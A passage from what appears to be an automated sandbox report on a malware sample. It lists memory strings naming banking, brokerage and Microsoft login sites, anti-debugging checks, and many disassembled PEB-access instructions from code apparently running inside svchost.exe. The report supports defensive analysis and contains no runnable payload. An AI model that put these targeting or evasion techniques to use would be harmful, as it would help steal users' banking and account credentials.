                Source: 8H1GI19a3.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: HJizhlDIjKVk.exe, 00000009.00000002.4582311351.00000000014CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllj
                Source: 8H1GI19a3.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: 8H1GI19a3.7.drBinary or memory string: global block list test formVMware20,11696487552
                Source: 8H1GI19a3.7.drBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: control.exe, 00000007.00000002.4591356745.0000000008078000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .comVMware20,11696487552t
                Source: 8H1GI19a3.7.drBinary or memory string: AMC password management pageVMware20,11696487552
                Source: 8H1GI19a3.7.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: 8H1GI19a3.7.drBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: 8H1GI19a3.7.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: 8H1GI19a3.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: control.exe, 00000007.00000002.4591356745.0000000008078000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,11696487552}
                Source: control.exe, 00000007.00000002.4591356745.0000000008078000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware
                Source: control.exe, 00000007.00000002.4579928297.0000000002F89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6
                Source: 8H1GI19a3.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: 8H1GI19a3.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: control.exe, 00000007.00000002.4591356745.0000000008078000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: formVMware20,11696487552
                Source: 8H1GI19a3.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: 8H1GI19a3.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: control.exe, 00000007.00000002.4591356745.0000000008078000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,116964875I
                Source: 8H1GI19a3.7.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: 8H1GI19a3.7.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: 8H1GI19a3.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: 8H1GI19a3.7.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: 8H1GI19a3.7.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: 8H1GI19a3.7.drBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: control.exe, 00000007.00000002.4591356745.0000000008078000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552
                Source: control.exe, 00000007.00000002.4591356745.0000000008078000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,1169648
                Source: control.exe, 00000007.00000002.4591356745.0000000008078000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rdVMware20,11696487552x
                Source: 8H1GI19a3.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: 8H1GI19a3.7.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: 8H1GI19a3.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: control.exe, 00000007.00000002.4591356745.0000000008078000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kofamerica.comVMware20,11696487552x
                Source: 8H1GI19a3.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: 8H1GI19a3.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: firefox.exe, 0000000A.00000002.2795316899.0000015E8B13C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllBB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeAPI call chain: ExitProcess graph end nodegraph_0-86727
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387096E rdtsc 2_2_0387096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417793 LdrLoadDll,2_2_00417793
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_03D9A298 mov eax, dword ptr fs:[00000030h]0_2_03D9A298
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_03D9A238 mov eax, dword ptr fs:[00000030h]0_2_03D9A238
                Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.20173.21714.exeCode function: 0_2_03D98BB8 mov eax, dword ptr fs:[00000030h]0_2_03D98BB8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]2_2_0382E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]2_2_0382E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]2_2_0382E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385438F mov eax, dword ptr fs:[00000030h]2_2_0385438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385438F mov eax, dword ptr fs:[00000030h]2_2_0385438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]2_2_03828397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]2_2_03828397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]2_2_03828397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EC3CD mov eax, dword ptr fs:[00000030h]2_2_038EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]2_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]2_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]2_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]2_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B63C0 mov eax, dword ptr fs:[00000030h]2_2_038B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]2_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]2_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE3DB mov ecx, dword ptr fs:[00000030h]2_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]2_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D43D4 mov eax, dword ptr fs:[00000030h]2_2_038D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D43D4 mov eax, dword ptr fs:[00000030h]2_2_038D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]2_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]2_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]2_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038663FF mov eax, dword ptr fs:[00000030h]2_2_038663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]2_2_0386A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]2_2_0386A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]2_2_0386A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C310 mov ecx, dword ptr fs:[00000030h]2_2_0382C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03850310 mov ecx, dword ptr fs:[00000030h]2_2_03850310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03908324 mov eax, dword ptr fs:[00000030h]2_2_03908324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03908324 mov ecx, dword ptr fs:[00000030h]2_2_03908324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03908324 mov eax, dword ptr fs:[00000030h]2_2_03908324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03908324 mov eax, dword ptr fs:[00000030h]2_2_03908324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov ecx, dword ptr fs:[00000030h]2_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FA352 mov eax, dword ptr fs:[00000030h]2_2_038FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D8350 mov ecx, dword ptr fs:[00000030h]2_2_038D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390634F mov eax, dword ptr fs:[00000030h]2_2_0390634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D437C mov eax, dword ptr fs:[00000030h]2_2_038D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E284 mov eax, dword ptr fs:[00000030h]2_2_0386E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E284 mov eax, dword ptr fs:[00000030h]2_2_0386E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]2_2_038B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]2_2_038B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]2_2_038B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov ecx, dword ptr fs:[00000030h]2_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039062D6 mov eax, dword ptr fs:[00000030h]2_2_039062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]2_2_038402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]2_2_038402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]2_2_038402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382823B mov eax, dword ptr fs:[00000030h]2_2_0382823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B8243 mov eax, dword ptr fs:[00000030h]2_2_038B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B8243 mov ecx, dword ptr fs:[00000030h]2_2_038B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390625D mov eax, dword ptr fs:[00000030h]2_2_0390625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A250 mov eax, dword ptr fs:[00000030h]2_2_0382A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836259 mov eax, dword ptr fs:[00000030h]2_2_03836259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EA250 mov eax, dword ptr fs:[00000030h]2_2_038EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EA250 mov eax, dword ptr fs:[00000030h]2_2_038EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]2_2_03834260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]2_2_03834260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]2_2_03834260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382826B mov eax, dword ptr fs:[00000030h]2_2_0382826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03870185 mov eax, dword ptr fs:[00000030h]2_2_03870185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EC188 mov eax, dword ptr fs:[00000030h]2_2_038EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EC188 mov eax, dword ptr fs:[00000030h]2_2_038EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D4180 mov eax, dword ptr fs:[00000030h]2_2_038D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D4180 mov eax, dword ptr fs:[00000030h]2_2_038D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]2_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]2_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]2_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]2_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]2_2_0382A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]2_2_0382A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]2_2_0382A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F61C3 mov eax, dword ptr fs:[00000030h]2_2_038F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F61C3 mov eax, dword ptr fs:[00000030h]2_2_038F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]2_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]2_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]2_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]2_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039061E5 mov eax, dword ptr fs:[00000030h]2_2_039061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038601F8 mov eax, dword ptr fs:[00000030h]2_2_038601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]2_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]2_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]2_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]2_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA118 mov ecx, dword ptr fs:[00000030h]2_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]2_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]2_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]2_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F0115 mov eax, dword ptr fs:[00000030h]2_2_038F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03860124 mov eax, dword ptr fs:[00000030h]2_2_03860124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]2_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]2_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov ecx, dword ptr fs:[00000030h]2_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]2_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]2_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C156 mov eax, dword ptr fs:[00000030h]2_2_0382C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C8158 mov eax, dword ptr fs:[00000030h]2_2_038C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836154 mov eax, dword ptr fs:[00000030h]2_2_03836154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836154 mov eax, dword ptr fs:[00000030h]2_2_03836154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904164 mov eax, dword ptr fs:[00000030h]2_2_03904164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904164 mov eax, dword ptr fs:[00000030h]2_2_03904164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383208A mov eax, dword ptr fs:[00000030h]2_2_0383208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038280A0 mov eax, dword ptr fs:[00000030h]2_2_038280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C80A8 mov eax, dword ptr fs:[00000030h]2_2_038C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F60B8 mov eax, dword ptr fs:[00000030h]2_2_038F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F60B8 mov ecx, dword ptr fs:[00000030h]2_2_038F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B20DE mov eax, dword ptr fs:[00000030h]2_2_038B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0382A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038380E9 mov eax, dword ptr fs:[00000030h]2_2_038380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B60E0 mov eax, dword ptr fs:[00000030h]2_2_038B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C0F0 mov eax, dword ptr fs:[00000030h]2_2_0382C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038720F0 mov ecx, dword ptr fs:[00000030h]2_2_038720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B4000 mov ecx, dword ptr fs:[00000030h]2_2_038B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
